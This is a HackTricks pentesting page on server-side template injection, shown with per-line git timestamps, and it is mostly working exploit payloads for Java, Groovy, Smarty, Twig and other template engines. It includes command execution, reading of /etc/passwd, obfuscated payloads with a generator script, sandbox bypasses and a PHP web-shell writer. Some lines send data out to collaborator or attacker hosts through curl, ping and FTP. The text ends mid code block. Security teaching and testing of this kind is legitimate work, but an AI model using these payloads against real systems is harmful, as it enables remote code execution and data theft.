2022-04-28 23:27:22 +00:00
# SSTI (Server Side Template Injection)
2022-04-28 16:01:33 +00:00
< details >
2024-01-01 17:15:42 +00:00
< summary > < strong > Learn AWS hacking from zero to hero with< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > !< / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-01-01 17:15:42 +00:00
Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS** ](https://github.com/sponsors/carlospolop )!
2022-09-09 11:57:02 +00:00
* Get the [**official PEASS & HackTricks swag** ](https://peass.creator-spring.com )
2024-01-01 17:15:42 +00:00
* Discover [**The PEASS Family** ](https://opensea.io/collection/the-peass-family ), our collection of exclusive [**NFTs** ](https://opensea.io/collection/the-peass-family )
2024-02-23 15:34:31 +00:00
* **Join the** 💬 [**Discord group** ](https://discord.gg/hRep4RUj7f ) or the [**telegram group** ](https://t.me/peass ) or **follow** us on **Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks\_live )**.**
2024-01-01 17:15:42 +00:00
* **Share your hacking tricks by submitting PRs to the** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) and [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github repos.
2022-04-28 16:01:33 +00:00
< / details >
2023-06-25 23:05:20 +00:00
< figure > < img src = "../../.gitbook/assets/image (1) (3) (3).png" alt = "" > < figcaption > < / figcaption > < / figure >
2022-10-25 15:56:49 +00:00
[**RootedCON** ](https://www.rootedcon.com ) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe** . With **the mission of promoting technical knowledge** , this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
{% embed url="https://www.rootedcon.com/" %}
2024-02-06 14:12:47 +00:00
## What is SSTI (Server-Side Template Injection)
2020-07-15 15:43:14 +00:00
2024-02-06 14:12:47 +00:00
Server-side template injection is a vulnerability that occurs when an attacker can inject malicious code into a template that is executed on the server. This vulnerability can be found in various technologies, including Jinja.
2020-07-15 15:43:14 +00:00
2024-02-06 14:12:47 +00:00
Jinja is a popular template engine used in web applications. Let's consider an example that demonstrates a vulnerable code snippet using Jinja:
2020-07-15 15:43:14 +00:00
2024-02-06 14:12:47 +00:00
```python
output = template.render(name=request.args.get('name'))
2020-07-15 15:43:14 +00:00
```
2024-02-06 14:12:47 +00:00
In this vulnerable code, the `name` parameter from the user's request is directly passed into the template using the `render` function. This can potentially allow an attacker to inject malicious code into the `name` parameter, leading to server-side template injection.
2020-07-15 15:43:14 +00:00
2024-02-06 14:12:47 +00:00
For instance, an attacker could craft a request with a payload like this:
2020-07-15 15:43:14 +00:00
2021-10-18 11:21:18 +00:00
```
2024-02-06 14:12:47 +00:00
http://vulnerable-website.com/?name={{bad-stuff-here}}
2020-07-15 15:43:14 +00:00
```
2024-02-06 14:12:47 +00:00
The payload `{{bad-stuff-here}}` is injected into the `name` parameter. This payload can contain Jinja template directives that enable the attacker to execute unauthorized code or manipulate the template engine, potentially gaining control over the server.
2020-07-15 15:43:14 +00:00
2024-02-06 14:12:47 +00:00
To prevent server-side template injection vulnerabilities, developers should ensure that user input is properly sanitized and validated before being inserted into templates. Implementing input validation and using context-aware escaping techniques can help mitigate the risk of this vulnerability.
2020-07-15 15:43:14 +00:00
2024-02-06 14:12:47 +00:00
### Detection
2020-07-15 15:43:14 +00:00
2024-02-23 15:34:31 +00:00
To detect Server-Side Template Injection (SSTI), initially, **fuzzing the template** is a straightforward approach. This involves injecting a sequence of special characters (**`${{< %[%'"}}%\`**) into the template and analyzing the differences in the server's response to regular data versus this special payload. Vulnerability indicators include:
2020-07-15 15:43:14 +00:00
2024-02-23 15:34:31 +00:00
* Thrown errors, revealing the vulnerability and potentially the template engine.
* Absence of the payload in the reflection, or parts of it missing, implying the server processes it differently than regular data.
* **Plaintext Context**: Distinguish from XSS by checking if the server evaluates template expressions (e.g., `{{7*7}}` , `${7*7}` ).
* **Code Context**: Confirm vulnerability by altering input parameters. For instance, changing `greeting` in `http://vulnerable-website.com/?greeting=data.username` to see if the server's output is dynamic or fixed, like in `greeting=data.username}}hello` returning the username.
2020-07-15 15:43:14 +00:00
2024-02-06 14:12:47 +00:00
#### Identification Phase
2024-02-23 15:34:31 +00:00
2024-02-06 14:12:47 +00:00
Identifying the template engine involves analyzing error messages or manually testing various language-specific payloads. Common payloads causing errors include `${7/0}` , `{{7/0}}` , and `<%= 7/0 %>` . Observing the server's response to mathematical operations helps pinpoint the specific template engine.
2020-07-15 15:43:14 +00:00
2022-05-01 13:25:53 +00:00
## Tools
2021-06-25 12:34:30 +00:00
2023-12-03 12:14:19 +00:00
### [TInjA](https://github.com/Hackmanit/TInjA)
2023-12-04 09:24:40 +00:00
2023-12-03 12:14:19 +00:00
an efficient SSTI + CSTI scanner which utilizes novel polyglots
```bash
tinja url -u "http://example.com/?name=Kirlia" -H "Authentication: Bearer ey..."
tinja url -u "http://example.com/" -d "username=Kirlia" -c "PHPSESSID=ABC123..."
```
2024-01-07 06:40:59 +00:00
### [SSTImap](https://github.com/vladko312/sstimap)
```bash
python3 sstimap.py -i -l 5
python3 sstimap.py -u "http://example.com/ --crawl 5 --forms
python3 sstimap.py -u 'https://example.com/page?name=John' -s
```
2022-05-01 13:25:53 +00:00
### [Tplmap](https://github.com/epinna/tplmap)
2021-06-25 12:34:30 +00:00
```python
python2.7 ./tplmap.py -u 'http://www.target.com/page?name=John*' --os-shell
python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=*& comment=supercomment& link"
python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*& comment=A& link" --level 5 -e jade
```
2023-12-04 09:24:40 +00:00
### [Template Injection Table](https://github.com/Hackmanit/template-injection-table)
2023-12-03 12:14:19 +00:00
an interactive table containing the most efficient template injection polyglots along with the expected responses of the 44 most important template engines.
2022-05-01 13:25:53 +00:00
## Exploits
2020-07-15 15:43:14 +00:00
2022-05-01 13:25:53 +00:00
### Generic
2021-06-27 20:19:16 +00:00
In this **wordlist** you can find **variables defined** in the environments of some of the engines mentioned below:
* [https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/template-engines-special-vars.txt ](https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/template-engines-special-vars.txt )
2024-02-06 14:12:47 +00:00
* [https://github.com/danielmiessler/SecLists/blob/25d4ac447efb9e50b640649f1a09023e280e5c9c/Discovery/Web-Content/burp-parameter-names.txt ](https://github.com/danielmiessler/SecLists/blob/25d4ac447efb9e50b640649f1a09023e280e5c9c/Discovery/Web-Content/burp-parameter-names.txt )
2021-06-27 20:19:16 +00:00
2022-05-01 13:25:53 +00:00
### Java
2021-06-25 12:34:30 +00:00
2022-04-28 23:27:22 +00:00
**Java - Basic injection**
2021-06-25 12:34:30 +00:00
```java
${7*7}
${{7*7}}
${class.getClassLoader()}
${class.getResource("").getPath()}
${class.getResource("../../../../../index.htm").getContent()}
2024-02-06 14:12:47 +00:00
// if ${...} doesn't work try #{...}, *{...}, @{...} or ~{...}.
2021-06-25 12:34:30 +00:00
```
2022-04-28 23:27:22 +00:00
**Java - Retrieve the system’ s environment variables**
2021-06-25 12:34:30 +00:00
```java
${T(java.lang.System).getenv()}
```
2022-04-28 23:27:22 +00:00
**Java - Retrieve /etc/passwd**
2021-06-25 12:34:30 +00:00
```java
${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}
${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
```
2022-05-01 13:25:53 +00:00
### FreeMarker (Java)
2020-07-15 15:43:14 +00:00
2021-10-18 11:21:18 +00:00
You can try your payloads at [https://try.freemarker.apache.org ](https://try.freemarker.apache.org )
2021-06-25 12:34:30 +00:00
2020-07-15 15:43:14 +00:00
* `{{7*7}} = {{7*7}}`
* `${7*7} = 49`
2021-06-25 12:34:30 +00:00
* `#{7*7} = 49 -- (legacy)`
2020-07-15 15:43:14 +00:00
* `${7*'7'} Nothing`
* `${foobar}`
2021-06-25 12:34:30 +00:00
```java
< #assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}
[#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')}
${"freemarker.template.utility.Execute"?new()("id")}
2020-07-15 15:43:14 +00:00
${product.getClass().getProtectionDomain().getCodeSource().getLocation().toURI().resolve('/home/carlos/my_password.txt').toURL().openStream().readAllBytes()?join(" ")}
```
2022-04-28 23:27:22 +00:00
**Freemarker - Sandbox bypass**
2021-06-25 12:34:30 +00:00
⚠️ only works on Freemarker versions below 2.3.30
```java
< #assign classloader=article.class.protectionDomain.classLoader>
< #assign owc=classloader.loadClass("freemarker.template.ObjectWrapper")>
< #assign dwf=owc.getField("DEFAULT_WRAPPER").get(null)>
< #assign ec=classloader.loadClass("freemarker.template.utility.Execute")>
${dwf.newInstance(ec,null)("id")}
```
2022-04-28 23:27:22 +00:00
**More information**
2020-07-15 15:43:14 +00:00
* In FreeMarker section of [https://portswigger.net/research/server-side-template-injection ](https://portswigger.net/research/server-side-template-injection )
2021-10-18 11:21:18 +00:00
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#freemarker ](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#freemarker )
2020-07-15 15:43:14 +00:00
2022-05-01 13:25:53 +00:00
### Velocity (Java)
2020-07-15 15:43:14 +00:00
2021-06-25 12:34:30 +00:00
```java
#set($str=$class.inspect("java.lang.String").type)
#set($chr=$class.inspect("java.lang.Character").type)
#set($ex=$class.inspect("java.lang.Runtime").type.getRuntime().exec("whoami"))
$ex.waitFor()
#set($out=$ex.getInputStream())
#foreach($i in [1..$out.available()])
$str.valueOf($chr.toChars($out.read()))
#end
```
2022-04-28 23:27:22 +00:00
**More information**
2020-07-15 15:43:14 +00:00
* In Velocity section of [https://portswigger.net/research/server-side-template-injection ](https://portswigger.net/research/server-side-template-injection )
2021-10-18 11:21:18 +00:00
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#velocity ](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#velocity )
2020-07-15 15:43:14 +00:00
2024-02-06 14:12:47 +00:00
### Thymeleaf
2020-07-15 15:43:14 +00:00
2024-02-06 14:12:47 +00:00
In Thymeleaf, a common test for SSTI vulnerabilities is the expression `${7*7}` , which also applies to this template engine. For potential remote code execution, expressions like the following can be used:
2020-07-15 15:43:14 +00:00
2024-02-23 15:34:31 +00:00
* SpringEL:
```java
${T(java.lang.Runtime).getRuntime().exec('calc')}
```
* OGNL:
```java
${#rt = @java .lang.Runtime@getRuntime(),#rt.exec("calc")}
```
2020-07-15 15:43:14 +00:00
2024-02-06 14:12:47 +00:00
Thymeleaf requires these expressions to be placed within specific attributes. However, _expression inlining_ is supported for other template locations, using syntax like `[[...]]` or `[(...)]` . Thus, a simple SSTI test payload might look like `[[${7*7}]]` .
2020-07-15 15:43:14 +00:00
2024-02-06 14:12:47 +00:00
However, the likelihood of this payload working is generally low. Thymeleaf's default configuration doesn't support dynamic template generation; templates must be predefined. Developers would need to implement their own `TemplateResolver` to create templates from strings on-the-fly, which is uncommon.
2020-07-15 15:43:14 +00:00
2024-02-06 14:12:47 +00:00
Thymeleaf also offers _expression preprocessing_ , where expressions within double underscores (`__...__`) are preprocessed. This feature can be utilized in the construction of expressions, as demonstrated in Thymeleaf's documentation:
2020-07-15 15:43:14 +00:00
2021-06-25 12:34:30 +00:00
```java
2020-07-15 15:43:14 +00:00
#{selection.__${sel.code}__}
```
2024-02-06 14:12:47 +00:00
**Example of Vulnerability in Thymeleaf**
Consider the following code snippet, which could be susceptible to exploitation:
2020-07-15 15:43:14 +00:00
2024-02-06 14:12:47 +00:00
```xml
2020-07-15 15:43:14 +00:00
< a th:href = "@{__${path}__}" th:title = "${title}" >
2022-05-18 13:29:23 +00:00
< a th:href = "${''.getClass().forName('java.lang.Runtime').getRuntime().exec('curl -d @/flag .txt burpcollab.com')}" th:title = 'pepito' >
2024-02-06 14:12:47 +00:00
```
2020-07-15 15:43:14 +00:00
2024-02-06 14:12:47 +00:00
This indicates that if the template engine processes these inputs improperly, it might lead to remote code execution accessing URLs like:
```
2020-07-15 15:43:14 +00:00
http://localhost:8082/(7*7)
http://localhost:8082/(${T(java.lang.Runtime).getRuntime().exec('calc')})
```
2022-04-28 23:27:22 +00:00
**More information**
2020-07-15 15:43:14 +00:00
* [https://www.acunetix.com/blog/web-security-zone/exploiting-ssti-in-thymeleaf/ ](https://www.acunetix.com/blog/web-security-zone/exploiting-ssti-in-thymeleaf/ )
2022-05-18 13:29:23 +00:00
{% content-ref url="el-expression-language.md" %}
[el-expression-language.md ](el-expression-language.md )
{% endcontent-ref %}
2022-09-26 02:13:30 +00:00
### Spring Framework (Java)
```java
*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('id').getInputStream())}
```
2023-01-13 17:40:30 +00:00
2022-12-30 16:36:06 +00:00
**Bypass filters**
2022-09-26 02:13:30 +00:00
2022-12-30 16:36:06 +00:00
Multiple variable expressions can be used, if `${...}` doesn't work try `#{...}` , `*{...}` , `@{...}` or `~{...}` .
2023-01-13 17:40:30 +00:00
* Read `/etc/passwd`
2022-12-30 16:36:06 +00:00
```java
${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
```
2023-01-13 17:40:30 +00:00
* Custom Script for payload generation
2022-12-30 16:36:06 +00:00
```python
#!/usr/bin/python3
## Written By Zeyad Abulaban (zAbuQasem)
# Usage: python3 gen.py "id"
from sys import argv
cmd = list(argv[1].strip())
print("Payload: ", cmd , end="\n\n")
converted = [ord(c) for c in cmd]
base_payload = '*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec'
end_payload = '.getInputStream())}'
count = 1
for i in converted:
if count == 1:
base_payload += f"(T(java.lang.Character).toString({i}).concat"
count += 1
elif count == len(converted):
base_payload += f"(T(java.lang.Character).toString({i})))"
else:
base_payload += f"(T(java.lang.Character).toString({i})).concat"
count += 1
print(base_payload + end_payload)
```
2023-01-13 17:40:30 +00:00
2022-12-30 16:36:06 +00:00
**More Information**
2023-01-13 17:40:30 +00:00
* [Thymleaf SSTI ](https://javamana.com/2021/11/20211121071046977B.html )
* [Payloads all the things ](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#java---retrieve-etcpasswd )
2022-05-01 13:25:53 +00:00
### Spring View Manipulation (Java)
2020-09-22 09:07:48 +00:00
2021-06-25 12:34:30 +00:00
```java
__${new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("id").getInputStream()).next()}__::.x
__${T(java.lang.Runtime).getRuntime().exec("touch executed")}__::.x
```
2020-09-22 09:07:48 +00:00
2022-05-18 13:29:23 +00:00
* [https://github.com/veracode-research/spring-view-manipulation ](https://github.com/veracode-research/spring-view-manipulation )
{% content-ref url="el-expression-language.md" %}
[el-expression-language.md ](el-expression-language.md )
{% endcontent-ref %}
2020-09-22 09:07:48 +00:00
2022-05-01 13:25:53 +00:00
### Pebble (Java)
2021-06-25 12:34:30 +00:00
* `{{ someString.toUPPERCASE() }}`
2021-10-18 11:21:18 +00:00
Old version of Pebble ( < version 3 . 0 . 9 ) :
2021-06-25 12:34:30 +00:00
```java
{{ variable.getClass().forName('java.lang.Runtime').getRuntime().exec('ls -la') }}
```
New version of Pebble :
```java
2022-02-09 16:22:44 +00:00
{% raw %}
2021-06-25 12:34:30 +00:00
{% set cmd = 'id' %}
2022-02-09 16:22:44 +00:00
{% endraw %}
2023-04-05 23:11:20 +00:00
2023-04-30 21:23:47 +00:00
2024-02-23 15:34:31 +00:00
2021-06-25 12:34:30 +00:00
{% set bytes = (1).TYPE
.forName('java.lang.Runtime')
.methods[6]
.invoke(null,null)
.exec(cmd)
.inputStream
.readAllBytes() %}
{{ (1).TYPE
.forName('java.lang.String')
.constructors[0]
.newInstance(([bytes]).toArray()) }}
```
2022-05-01 13:25:53 +00:00
### Jinjava (Java)
2021-06-25 12:34:30 +00:00
```java
{{'a'.toUpperCase()}} would result in 'A'
{{ request }} would return a request object like com.[...].context.TemplateContextRequest@23548206
```
Jinjava is an open source project developed by Hubspot, available at [https://github.com/HubSpot/jinjava/ ](https://github.com/HubSpot/jinjava/ )
2022-04-28 23:27:22 +00:00
**Jinjava - Command execution**
2021-06-25 12:34:30 +00:00
Fixed by [https://github.com/HubSpot/jinjava/pull/230 ](https://github.com/HubSpot/jinjava/pull/230 )
```java
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.String('xxx')\")}}
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"whoami\\\"); x.start()\")}}
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
```
2022-04-28 23:27:22 +00:00
**More information**
2021-06-25 12:34:30 +00:00
2021-10-18 11:21:18 +00:00
* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#jinjava ](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#jinjava )
2021-06-25 12:34:30 +00:00
2022-05-01 13:25:53 +00:00
### Hubspot - HuBL (Java)
2021-06-26 13:19:42 +00:00
* `{% %}` statement delimiters
* `{{ }}` expression delimiters
* `{# #}` comment delimiters
2022-04-06 08:57:29 +00:00
* `{{ request }}` - com.hubspot.content.hubl.context.TemplateContextRequest@23548206
2021-06-26 13:19:42 +00:00
* `{{'a'.toUpperCase()}}` - "A"
* `{{'a'.concat('b')}}` - "ab"
* `{{'a'.getClass()}}` - java.lang.String
* `{{request.getClass()}}` - class com.hubspot.content.hubl.context.TemplateContextRequest
2022-04-06 08:57:29 +00:00
* `{{request.getClass().getDeclaredMethods()[0]}}` - public boolean com.hubspot.content.hubl.context.TemplateContextRequest.isDebug()
2021-06-26 13:19:42 +00:00
Search for "com.hubspot.content.hubl.context.TemplateContextRequest" and discovered the [Jinjava project on Github ](https://github.com/HubSpot/jinjava/ ).
```java
{{request.isDebug()}}
//output: False
//Using string 'a' to get an instance of class sun.misc.Launcher
{{'a'.getClass().forName('sun.misc.Launcher').newInstance()}}
//output: sun.misc.Launcher@715537d4
//It is also possible to get a new object of the Jinjava class
{{'a'.getClass().forName('com.hubspot.jinjava.JinjavaConfig').newInstance()}}
//output: com.hubspot.jinjava.JinjavaConfig@78a56797
2022-04-06 08:57:29 +00:00
//It was also possible to call methods on the created object by combining the
2022-04-06 16:21:07 +00:00
2022-04-28 15:47:13 +00:00
2022-04-28 23:27:22 +00:00
2022-04-06 08:57:29 +00:00
{% raw %}
2022-02-09 16:22:44 +00:00
{% %} and {{ }} blocks
{% set ji='a'.getClass().forName('com.hubspot.jinjava.Jinjava').newInstance().newInterpreter() %}
2022-04-06 08:57:29 +00:00
{% endraw %}
{{ji.render('{{1*2}}')}}
2021-06-26 13:19:42 +00:00
//Here, I created a variable 'ji' with new instance of com.hubspot.jinjava.Jinjava class and obtained reference to the newInterpreter method. In the next block, I called the render method on 'ji' with expression {{1*2}}.
//{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.String('xxx')\")}}
//output: xxx
//RCE
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"whoami\\\"); x.start()\")}}
//output: java.lang.UNIXProcess@1e5f456e
//RCE with org.apache.commons.io.IOUtils.
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
//output: netstat execution
//Multiple arguments to the commands
Payload: {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
2022-04-06 08:57:29 +00:00
//Output: Linux bumpy-puma 4.9.62-hs4.el6.x86_64 #1 SMP Fri Jun 1 03:00:47 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
2021-06-26 13:19:42 +00:00
```
2022-04-28 23:27:22 +00:00
**More information**
2021-06-26 13:19:42 +00:00
* [https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html ](https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html )
2022-05-01 13:25:53 +00:00
### Expression Language - EL (Java)
2021-06-07 09:30:58 +00:00
2021-06-26 13:24:50 +00:00
* `${"aaaa"}` - "aaaa"
2022-04-05 22:24:52 +00:00
* `${99999+1}` - 100000.
2021-06-26 13:24:50 +00:00
* `#{7*7}` - 49
2021-06-26 14:55:22 +00:00
* `${{7*7}}` - 49
* `${{request}}, ${{session}}, {{faceContext}}`
2021-06-26 13:24:50 +00:00
2024-02-06 14:12:47 +00:00
Expression Language (EL) is a fundamental feature that facilitates interaction between the presentation layer (like web pages) and the application logic (like managed beans) in JavaEE. It's used extensively across multiple JavaEE technologies to streamline this communication. The key JavaEE technologies utilizing EL include:
2024-02-23 15:34:31 +00:00
* **JavaServer Faces (JSF)**: Employs EL to bind components in JSF pages to the corresponding backend data and actions.
* **JavaServer Pages (JSP)**: EL is used in JSP for accessing and manipulating data within JSP pages, making it easier to connect page elements to the application data.
* **Contexts and Dependency Injection for Java EE (CDI)**: EL integrates with CDI to allow seamless interaction between the web layer and managed beans, ensuring a more coherent application structure.
2024-02-06 14:12:47 +00:00
2021-06-07 09:30:58 +00:00
Check the following page to learn more about the **exploitation of EL interpreters** :
2021-10-18 11:21:18 +00:00
{% content-ref url="el-expression-language.md" %}
[el-expression-language.md ](el-expression-language.md )
{% endcontent-ref %}
2021-06-07 09:30:58 +00:00
2022-09-26 09:52:47 +00:00
### Groovy (Java)
2024-02-05 02:28:59 +00:00
The following Security Manager bypasses were taken from this [**writeup** ](https://security.humanativaspa.it/groovy-template-engine-exploitation-notes-from-a-real-case-scenario/ ).
2022-09-26 09:52:47 +00:00
```java
//Basic Payload
import groovy.*;
@groovy .transform.ASTTest(value={
cmd = "ping cq6qwx76mos92gp9eo7746dmgdm5au.burpcollaborator.net "
assert java.lang.Runtime.getRuntime().exec(cmd.split(" "))
})
def x
//Payload to get output
import groovy.*;
@groovy .transform.ASTTest(value={
cmd = "whoami";
out = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmd.split(" ")).getInputStream()).useDelimiter("\\A").next()
cmd2 = "ping " + out.replaceAll("[^a-zA-Z0-9]","") + ".cq6qwx76mos92gp9eo7746dmgdm5au.burpcollaborator.net";
java.lang.Runtime.getRuntime().exec(cmd2.split(" "))
})
def x
//Other payloads
new groovy.lang.GroovyClassLoader().parseClass("@groovy.transform.ASTTest(value={assert java.lang.Runtime.getRuntime().exec(\"calc.exe\")})def x")
this.evaluate(new String(java.util.Base64.getDecoder().decode("QGdyb292eS50cmFuc2Zvcm0uQVNUVGVzdCh2YWx1ZT17YXNzZXJ0IGphdmEubGFuZy5SdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKCJpZCIpfSlkZWYgeA==")))
this.evaluate(new String(new byte[]{64, 103, 114, 111, 111, 118, 121, 46, 116, 114, 97, 110, 115, 102, 111, 114, 109, 46, 65, 83, 84, 84, 101, 115, 116, 40, 118, 97, 108, 117, 101, 61, 123, 97, 115, 115, 101, 114, 116, 32, 106, 97, 118, 97, 46, 108, 97, 110, 103, 46, 82, 117, 110, 116, 105, 109, 101, 46, 103, 101, 116, 82,117, 110, 116, 105, 109, 101, 40, 41, 46, 101, 120, 101, 99, 40, 34, 105, 100, 34, 41, 125, 41, 100, 101, 102, 32, 120}))
```
2022-10-25 15:56:49 +00:00
< figure > < img src = "https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt = "" > < figcaption > < / figcaption > < / figure >
[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe** . With **the mission of promoting technical knowledge** , this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
{% embed url="https://www.rootedcon.com/" %}
##
2022-05-01 13:25:53 +00:00
### Smarty (PHP)
2021-06-07 09:30:58 +00:00
2021-06-25 12:34:30 +00:00
```php
{$smarty.version}
{php}echo `id` ;{/php} //deprecated in smarty v3
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?> ",self::clearConfig())}
{system('ls')} // compatible v3
{system('cat index.php')} // compatible v3
```
2020-07-15 15:43:14 +00:00
2022-04-28 23:27:22 +00:00
**More information**
2020-07-15 15:43:14 +00:00
* In Smarty section of [https://portswigger.net/research/server-side-template-injection ](https://portswigger.net/research/server-side-template-injection )
2021-10-18 11:21:18 +00:00
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#smarty ](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#smarty )
2020-07-15 15:43:14 +00:00
2022-05-01 13:25:53 +00:00
### Twig (PHP)
2020-07-15 15:43:14 +00:00
* `{{7*7}} = 49`
* `${7*7} = ${7*7}`
* `{{7*'7'}} = 49`
* `{{1/0}} = Error`
* `{{foobar}} Nothing`
2021-06-25 12:34:30 +00:00
```python
#Get Info
{{_self}} #(Ref. to current application)
{{_self.env}}
{{dump(app)}}
{{app.request.server.all|join(',')}}
#File read
"{{'/etc/passwd'|file_excerpt(1,30)}}"@
#Exec code
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("whoami")}}
2022-10-03 13:43:01 +00:00
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("id;uname -a;hostname")}}
2021-06-25 12:34:30 +00:00
{{['id']|filter('system')}}
{{['cat\x20/etc/passwd']|filter('system')}}
{{['cat$IFS/etc/passwd']|filter('system')}}
2024-01-07 19:40:00 +00:00
{{['id',""]|sort('system')}}
#Hide warnings and errors for automatic exploitation
{{["error_reporting", "0"]|sort("ini_set")}}
2021-06-25 12:34:30 +00:00
```
2022-04-28 23:27:22 +00:00
**Twig - Template format**
2021-06-25 12:34:30 +00:00
```php
$output = $twig > render (
'Dear' . $_GET['custom_greeting'],
array("first_name" => $user.first_name)
);
$output = $twig > render (
"Dear {first_name}",
array("first_name" => $user.first_name)
);
```
2020-07-15 15:43:14 +00:00
2022-04-28 23:27:22 +00:00
**More information**
2020-07-15 15:43:14 +00:00
2021-10-18 11:21:18 +00:00
* In Twig and Twig (Sandboxed) section of [https://portswigger.net/research/server-side-template-injection ](https://portswigger.net/research/server-side-template-injection )
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#twig ](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#twig )
2020-07-15 15:43:14 +00:00
2023-03-28 17:50:22 +00:00
### Plates (PHP)
2024-02-06 14:12:47 +00:00
Plates is a templating engine native to PHP, drawing inspiration from Twig. However, unlike Twig, which introduces a new syntax, Plates leverages native PHP code in templates, making it intuitive for PHP developers.
2023-03-28 17:50:22 +00:00
2024-02-06 14:12:47 +00:00
Controller:
2023-03-28 17:50:22 +00:00
```php
// Create new Plates instance
$templates = new League\Plates\Engine('/path/to/templates');
